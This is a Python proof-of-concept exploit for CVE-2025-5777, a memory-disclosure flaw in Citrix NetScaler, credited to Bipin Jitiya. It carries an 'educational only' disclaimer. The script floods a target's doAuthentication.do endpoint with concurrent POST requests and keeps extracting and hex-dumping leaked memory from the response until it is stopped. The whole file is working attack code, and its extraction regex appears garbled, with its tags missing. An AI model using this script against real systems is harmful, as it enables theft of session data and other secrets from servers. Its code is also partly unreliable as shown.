#!/usr/bin/env python3
# Disclaimer: For authorized security research and educational use only.
"""
Title: Citrix NetScaler Memory Leak Exploit
CVE: CVE-2025-5777
Script Author: Bipin Jitiya (@win3zz)
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
"""
import sys
import asyncio
import aiohttp
import signal
import argparse
import re
from colorama import init, Fore, Style
# Init colorama
init(autoreset=True)
# Global flags
stop_flag = False
verbose = False
proxy = None
threads = 10
leak_detected_once = False
initial_check_done = False
def signal_handler(sig, frame):
global stop_flag
stop_flag = True
print(f"\n{Fore.YELLOW}[+] Stopping gracefully...")
def hex_dump(data):
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_bytes = ' '.join(f'{b:02x}' for b in chunk)
ascii_str = ''.join((chr(b) if 32 <= b <= 126 else '.') for b in chunk)
print(f'{i:08x}: {hex_bytes:<48} {ascii_str}')
def extract_initial_value(content_bytes):
global leak_detected_once
try:
content_str = content_bytes.decode("utf-8", errors="replace")
match = re.search(r"(.*?)", content_str, re.DOTALL)
if match and match.group(1).strip():
leak_detected_once = True
print(f"{Fore.GREEN}\n[+] Found InitialValue:")
val = match.group(1)
hex_dump(val.encode("utf-8", errors="replace"))
elif verbose:
print(f"{Fore.YELLOW}[DEBUG] No tag with value found.")
except Exception as e:
print(f"{Fore.RED}[!] Regex parsing error: {e}")
async def fetch(session, url):
full_url = f"{url}/p/u/doAuthentication.do"
try:
async with session.post(full_url, data="login", proxy=proxy, ssl=False) as response:
if verbose:
print(f"{Fore.CYAN}[DEBUG] POST to {full_url} -> Status: {response.status}")
if response.status == 200:
content = await response.read()
if verbose:
print(f"{Fore.CYAN}[DEBUG] Response body (first 200 bytes): {content[:200]!r}")
extract_initial_value(content)
else:
if verbose:
print(f"{Fore.RED}[DEBUG] Non-200 status code received: {response.status}")
except aiohttp.ClientConnectorError as e:
print(f"{Fore.RED}[!] Connection Error: {e}")
except Exception as e:
print(f"{Fore.RED}[!] Unexpected Error: {e}")
async def main(url):
global stop_flag, leak_detected_once, initial_check_done
connector = aiohttp.TCPConnector(limit=threads)
timeout = aiohttp.ClientTimeout(total=15)
async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
while not stop_flag:
tasks = [fetch(session, url) for _ in range(threads)]
await asyncio.gather(*tasks)
if not initial_check_done:
initial_check_done = True
if not leak_detected_once:
print(f"{Fore.YELLOW}[+] No leak detected in initial round. Target likely not vulnerable.")
stop_flag = True
break
else:
print(f"{Fore.GREEN}[+] Leak detected! Continuing to extract...")
await asyncio.sleep(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2025-5777 Citrix NetScaler Memory Leak PoC (Educational Only)")
parser.add_argument("url", help="Base URL (e.g., http://target.com)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable debug output")
parser.add_argument("-p", "--proxy", help="HTTP proxy URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
args = parser.parse_args()
verbose = args.verbose
proxy = args.proxy
threads = args.threads
signal.signal(signal.SIGINT, signal_handler)
try:
asyncio.run(main(args.url.rstrip("/")))
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[+] Interrupted by user.")